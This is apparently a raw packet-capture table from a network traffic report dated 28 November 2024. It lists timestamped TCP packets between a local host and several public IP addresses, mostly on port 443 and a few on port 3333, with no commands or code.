                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.592886925 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.592894077 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.604358912 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.604552984 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.605195045 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.605201006 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.607598066 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.607630014 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.616708040 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.616755962 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.616763115 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.633249998 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.638753891 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.638825893 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.638834000 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.642855883 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.642884016 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.642939091 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.642946959 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.642983913 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.651298046 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.659287930 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.659322977 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.659351110 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.659364939 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.659714937 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.667133093 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.674683094 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.674756050 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.674765110 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.682332993 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.682425976 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.682506084 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.682518005 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.682579041 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.688350916 CET33334971245.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.689941883 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.694638968 CET497123333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.697480917 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.697545052 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.697554111 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.699820995 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.699839115 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.702454090 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.705329895 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.705399036 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.705409050 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.705415964 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.705460072 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.712724924 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.724519968 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.724560022 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.724567890 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.724575996 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.724931002 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.727921963 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.735621929 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.735665083 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.735673904 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.743135929 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.743185043 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.743191957 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.743331909 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.750377893 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.750720978 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.750791073 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.750853062 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.750861883 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.750899076 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.753057957 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.753092051 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.753303051 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.758503914 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.765974045 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.766032934 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.766047955 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.773638010 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.773693085 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.773700953 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.784022093 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.784054995 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.784161091 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.784171104 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.784470081 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.796247959 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.797521114 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.797638893 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.797704935 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.797713995 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.797761917 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.803381920 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.809181929 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.809190989 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.810391903 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.810467005 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.810542107 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.810554028 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.810645103 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.813143015 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.814510107 CET33334971245.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.817578077 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.824698925 CET49818443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.824750900 CET4434981813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.824842930 CET49818443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.825035095 CET49819443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.825108051 CET4434981913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.825222015 CET49819443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.825551033 CET49818443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.825568914 CET4434981813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.825946093 CET49819443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.825963974 CET4434981913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.830414057 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.830450058 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.830482006 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.830496073 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.830509901 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.830534935 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.832009077 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.832082033 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.832089901 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.834384918 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.834602118 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.834719896 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.834727049 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.836813927 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.836952925 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.837044954 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.837059975 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.839891911 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.883339882 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.954488993 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.957118988 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.957153082 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.206685066 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.209882021 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.209916115 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.213470936 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.241421938 CET44349813162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.241683006 CET44349812162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.242130995 CET49813443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.242147923 CET44349813162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.242487907 CET44349813162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.243335009 CET49812443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.243350983 CET44349812162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.243556976 CET49813443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.243648052 CET44349813162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.244407892 CET44349812162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.244472027 CET49812443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.244770050 CET49812443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.244844913 CET44349812162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.262305021 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.262316942 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.265403032 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.293554068 CET49813443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.293564081 CET49812443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.293574095 CET44349812162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.307492971 CET49820443192.168.2.623.200.0.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.307528973 CET4434982023.200.0.6192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.307658911 CET49820443192.168.2.623.200.0.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.307837963 CET49820443192.168.2.623.200.0.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.307851076 CET4434982023.200.0.6192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.311333895 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.330738068 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.333707094 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.333719969 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.335078001 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.335083008 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.340435028 CET49812443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.407856941 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.411328077 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.411341906 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.474453926 CET44349814162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.474986076 CET49814443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.474998951 CET44349814162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.476452112 CET44349814162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.476530075 CET49814443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.476876974 CET49814443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.476960897 CET44349814162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.518776894 CET44349815162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.519840002 CET49815443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.519856930 CET44349815162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.520895958 CET44349815162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.520994902 CET49815443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.521300077 CET49815443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.521368027 CET44349815162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.527964115 CET49814443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.527976036 CET44349814162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.574804068 CET49815443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.574815035 CET44349815162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.574875116 CET49814443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.584943056 CET49821443192.168.2.623.209.72.28
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.584988117 CET4434982123.209.72.28192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.585095882 CET49821443192.168.2.623.209.72.28
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.585381031 CET49822443192.168.2.623.209.72.28
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.585418940 CET4434982223.209.72.28192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.585498095 CET49822443192.168.2.623.209.72.28
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.585680008 CET49821443192.168.2.623.209.72.28
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.585695028 CET4434982123.209.72.28192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.585823059 CET49822443192.168.2.623.209.72.28
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.585836887 CET4434982223.209.72.28192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.613149881 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.616087914 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.616111040 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.621853113 CET49815443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.815466881 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.818319082 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.818342924 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.871685982 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.871692896 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.874766111 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.919342041 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.937551975 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.940543890 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.940562963 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.940622091 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.940627098 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.019484997 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.024686098 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.024698973 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.267211914 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.269798994 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.269824982 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.380736113 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.383255959 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.383270979 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.384164095 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.434169054 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.434178114 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.437323093 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.483334064 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.502558947 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.506741047 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.506752968 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.507596016 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.507601023 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.542241096 CET497153333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.575004101 CET4434981913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.580398083 CET4434982023.200.0.6192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.582034111 CET49820443192.168.2.623.200.0.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.582047939 CET4434982023.200.0.6192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.582333088 CET49819443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.582364082 CET4434981913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.583076000 CET4434982023.200.0.6192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.583133936 CET49820443192.168.2.623.200.0.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.583414078 CET4434981913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.583470106 CET49819443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.620734930 CET4434981813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.623600960 CET49818443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.623611927 CET4434981813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.624639034 CET4434981813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.624701023 CET49818443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.662192106 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.662266016 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.662276030 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.662286043 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.662297964 CET497153333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.662332058 CET497153333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.662375927 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.662379026 CET497153333192.168.2.645.138.48.25
